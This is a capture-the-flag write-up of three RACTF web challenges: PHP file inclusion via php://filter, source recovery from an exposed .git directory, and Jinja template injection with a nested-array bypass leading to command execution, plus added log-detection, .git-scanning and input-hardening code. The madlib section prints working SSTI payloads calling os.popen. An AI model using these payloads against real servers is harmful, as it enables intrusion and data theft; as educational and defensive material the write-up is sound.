RACTF Web Challenges Writeup


RACTF Web: all challenges solved (AK). 🎉🎉🎉

notrequired

1. Initial assessment

Opening the page redirects automatically to /index.php?file=index.html.
Trying an arbitrary file read: /etc/passwd is read successfully.

2. Reading files

Use the php://filter wrapper to read index.php as a base64-encoded string.
Decoding it gives:

<?php

if(!isset($_GET["file"])){
    header("location: http://ctf.bennetthackingcommunity.cf:8333/index.php?file=index.html");
    exit;
}

else{
    require($_GET['file']);
}

#note to myself: delete /bin/secrets.txt!
?>

Following the hint, read /bin/secrets.txt.
Replace BUHC with DO to get the flag.
Get Flag!
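From the defender's side, the requests above (an absolute path, a php://filter wrapper, traversal sequences) are easy to spot in access logs. The following is an added example, not part of the original writeup: it parses constructed combined-format log lines, decodes the file= parameter (including double percent-encoding) and flags the values that match include/traversal indicators. The log lines and the parameter name are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not from the challenge server.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Oct/2021:14:55:01 +0000] "GET /index.php?file=index.html HTTP/1.1" 200 512
203.0.113.5 - - [09/Oct/2021:14:55:07 +0000] "GET /index.php?file=/etc/passwd HTTP/1.1" 200 1893
203.0.113.5 - - [09/Oct/2021:14:55:21 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 740
203.0.113.5 - - [09/Oct/2021:14:55:40 +0000] "GET /index.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1893
203.0.113.5 - - [09/Oct/2021:14:55:52 +0000] "GET /index.php?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1893
203.0.113.5 - - [09/Oct/2021:14:56:03 +0000] "GET /index.php?file=/bin/secrets.txt HTTP/1.1" 200 64
198.51.100.9 - - [09/Oct/2021:14:56:10 +0000] "GET /static/logo.png HTTP/1.1" 200 3120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator patterns, each with the reason reported when it matches a decoded value.
INDICATORS = (
    (re.compile(r"(^|/)\.\.(/|$)"), "path traversal"),
    (re.compile(r"^/(etc|proc|bin|root|var/log)(/|$)"), "absolute path to sensitive location"),
    (re.compile(r"^[a-z][a-z0-9.+-]*://", re.IGNORECASE), "stream wrapper"),
)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (..%252F) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_include_value(value):
    """Return the first matching indicator reason for one decoded value, or None."""
    for pattern, reason in INDICATORS:
        if pattern.search(value):
            return reason
    return None


def find_include_attempts(lines, param="file"):
    """Scan log lines for suspicious values of the include parameter.

    Returns a list of (ip, decoded_value, reason) tuples, one per flagged request.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for raw in parse_qs(query).get(param, []):  # parse_qs already decodes one layer
            value = decode_fully(raw)
            reason = classify_include_value(value)
            if reason:
                hits.append((m["ip"], value, reason))
    return hits


if __name__ == "__main__":
    for ip, value, reason in find_include_attempts(SAMPLE_LOG.splitlines()):
        print(f"{ip}\t{reason}\t{value}")
```

The root cause on the server is `require($_GET['file'])` with no validation; the durable fix is to map the parameter to an allowlist of page names rather than pass it to `require`, and to disable stream wrappers in includes (`allow_url_include` is off by default, but php://filter still works locally).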

git commit -m “whatever”

  1. Opening the page gives an encrypted string and a hint:
+M/pqMuo4pevO4qE7ETogLZjXSoiLhuqpmWh21pKXOpjftRMSq+ltAaloVOlwR3cGkaBeYxLQEb2kJ7FZg4UBxawjJvpcyKebpVoz6no
Only if you could see the source code.
  2. Scanning for paths reveals a **/.git/** directory.

Using GitHack, a tool for recovering source code from a leaked .git directory, the site's source is obtained:

├── Crypt
│   ├── AES.php
│   ├── Base.php
│   ├── Blowfish.php
│   ├── DES.php
│   ├── Hash.php
│   ├── RC2.php
│   ├── RC4.php
│   ├── RSA.php
│   ├── Random.php
│   ├── Rijndael.php
│   ├── TripleDES.php
│   └── Twofish.php
├── File
│   ├── ANSI.php
│   ├── ASN1.php
│   └── X509.php
├── Math
│   └── BigInteger.php
├── Net
│   ├── SCP.php
│   ├── SFTP
│   │   └── Stream.php
│   ├── SFTP.php
│   ├── SSH1.php
│   └── SSH2.php
├── System
│   ├── SSH
│   │   └── Agent.php
│   └── SSH_Agent.php
├── bootstrap.php
├── index.php
├── openssl.cnf
└── tempCodeRunnerFile.py
  3. Auditing the code: index.php contains a crypto class with two methods, encrypt() and decrypt(), for encryption and decryption.

  4. Decryption

  5. Call the decrypt() method:
$privatekey = "mRHpcEckKATdwDC/CwpRinDTiAYrn9lzWpTo277omKs=";
$encrypted = "rI6D6aK8m1HhT1oSfsP87trNCrLMMc0MoySGaVbku4H9A3WqS1CgEbhAdZ3VWMAoFuPr9WfG2s5szKfgUFnKnzqv7CieKQvyK/tplDZp ";
$dnc = crypto::decrypt($encrypted, $privatekey);
echo $dnc;
  6. Pitfall

The decryption code calls sodium_crypto_secretbox_open(), which only exists in PHP 7 >= 7.2.0 and PHP 8; running it under any other PHP version throws an error.

  7. Run the decryption code and get the flag!
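The whole chain starts with a .git directory left inside the web root. A deploy-time check catches that before the site goes live. The block below is an added example, not part of the writeup or of GitHack: it walks a web root, reports any VCS metadata directories found and which of the files that leak tools rely on are present. The throwaway web root it builds is constructed for the demo.

```python
import os
import tempfile
from pathlib import Path

# Directory names that must never be reachable under a web root.
VCS_DIRS = {".git", ".svn", ".hg"}
# Files whose presence means the leak is usable (history/index can be rebuilt from them).
SENSITIVE_MARKERS = {".git": ("HEAD", "config", "index"), ".svn": ("wc.db",), ".hg": ("store",)}


def find_exposed_vcs_dirs(webroot):
    """Walk the web root and return (relative_path, present_markers) for each VCS dir found."""
    webroot = Path(webroot)
    findings = []
    for dirpath, dirnames, _ in os.walk(webroot):
        for name in list(dirnames):
            if name in VCS_DIRS:
                full = Path(dirpath) / name
                present = [f for f in SENSITIVE_MARKERS[name] if (full / f).exists()]
                findings.append((str(full.relative_to(webroot)), present))
                dirnames.remove(name)  # no need to descend into the metadata itself
    return findings


def make_demo_webroot():
    """Build a constructed throwaway web root containing a leaked .git directory."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'hi'; ?>\n")
    git = root / ".git"
    git.mkdir()
    (git / "HEAD").write_text("ref: refs/heads/master\n")
    (git / "config").write_text("[core]\n\trepositoryformatversion = 0\n")
    (git / "objects").mkdir()
    (root / "assets").mkdir()
    return root


if __name__ == "__main__":
    demo = make_demo_webroot()
    for rel, markers in find_exposed_vcs_dirs(demo):
        print(f"exposed VCS dir: {rel} (markers present: {', '.join(markers) or 'none'})")
```

Run it against the real document root in CI or a pre-deploy hook and fail the build on any finding; as a second layer, the web server should deny requests to dot-directories regardless.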

madlib

1. Open the page and click "source" to get the source code:

from flask import Flask, render_template_string, request, send_from_directory

app = Flask(__name__)

@app.route('/')
def index():
    return send_from_directory('html', 'index.html')

@app.route('/madlib', methods=['POST'])
def madlib():
    if len(request.json) == 5:
        verb = request.json.get('verb')
        noun = request.json.get('noun')
        adjective = request.json.get('adjective')
        person = request.json.get('person')
        place = request.json.get('place')
        params = [verb, noun, adjective, person, place]
        if any(len(i) > 21 for i in params):
            return 'your words must not be longer than 21 characters!', 403
        madlib = f'To find out what this is you must {verb} the internet then get to the {noun} system through the visual MAC hard drive and program the open-source but overriding the bus won\'t do anything so you need to parse the online SSD transmitter, then index the neural DHCP card {adjective}.{person} taught me this trick when we met in {place} allowing you to download the knowledge of what this is directly to your brain.'
        return render_template_string(madlib)
    return 'This madlib only takes five words', 403

@app.route('/source')
def show_source():
    return send_from_directory('/app/', 'app.py')

app.run('0.0.0.0', port=1337)

2. Fill in the words and submit.

3. Capture the request.

4. Analyze the source code

From the source this is an SSTI challenge, and the following conditions must be met:

  • POST JSON data to /madlib
  • the JSON object has exactly 5 keys
  • none of verb, noun, adjective, person, place (the params list) may be longer than 21

5. Test for SSTI

Entering 24 in verb outputs 24.

6. Bypass the length check for RCE

I was stuck here for quite a while, then it occurred to me: since the data is JSON, can an array be nested? I tried it and it works.
The length limit is bypassed!

7. RCE

The string can be placed in a GET parameter and read with request.args.<parameter name>:

POST /madlib?e=__import__('os').popen('ls').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}

image.png

8. Get Flag

POST /madlib?e=__import__('os').popen('cat+flag.txt').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}
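Two defects make the challenge solvable: `len(i) > 21` is applied to whatever JSON value arrives, and for an array `len()` counts elements rather than characters; and the user's words are concatenated into the template source before `render_template_string` compiles it. The following is an added example, not the challenge's code: it reproduces the original check so the nested-array bypass can be seen, then shows hardened validation (type and length checked on the string itself) and rendering that treats the words as data. The template text is the page's own sentence; the function names are assumptions.

```python
WORD_KEYS = ("verb", "noun", "adjective", "person", "place")
MAX_LEN = 21

# Fixed template: placeholders are filled by str.format, so user words are inserted
# as data and never compiled by Jinja (unlike render_template_string(madlib) above).
MADLIB_TEMPLATE = (
    "To find out what this is you must {verb} the internet then get to the {noun} "
    "system through the visual MAC hard drive and program the open-source but "
    "overriding the bus won't do anything so you need to parse the online SSD "
    "transmitter, then index the neural DHCP card {adjective}.{person} taught me this "
    "trick when we met in {place} allowing you to download the knowledge of what "
    "this is directly to your brain."
)


def original_length_check(payload):
    """The challenge's own check, reproduced: len() of each value must be <= 21.
    For a JSON array, len() counts elements, so ["<long string>", 2] has length 2."""
    params = [payload.get(k) for k in WORD_KEYS]
    return len(payload) == 5 and not any(len(i) > MAX_LEN for i in params)


def validate_words(payload):
    """Hardened validation. Returns (words, None) on success or (None, error) on failure."""
    if not isinstance(payload, dict) or set(payload) != set(WORD_KEYS):
        return None, "exactly the five expected words are required"
    words = {}
    for key in WORD_KEYS:
        value = payload[key]
        if not isinstance(value, str):        # rejects nested arrays/objects outright
            return None, f"{key} must be a string"
        if not 1 <= len(value) <= MAX_LEN:    # length measured on the string itself
            return None, f"{key} must be 1 to {MAX_LEN} characters"
        words[key] = value
    return words, None


def render_madlib(words):
    """Fill the fixed template; braces inside the words are copied literally."""
    return MADLIB_TEMPLATE.format(**words)


if __name__ == "__main__":
    good = {"verb": "search", "noun": "file", "adjective": "quickly",
            "person": "Alice", "place": "Paris"}
    bypass = dict(good, verb=["x" * 40, 2])
    print("original check passes nested array:", original_length_check(bypass))
    print("hardened check:", validate_words(bypass))
    print(render_madlib(validate_words(good)[0]))
```

In the Flask handler the equivalent change is to keep a static template and pass the validated words as context (`render_template_string(TEMPLATE, **words)` or a template file), so template syntax in a word is rendered as text, and to reject any value that is not a string before measuring its length.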


Author: Truda
License: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Truda when reposting!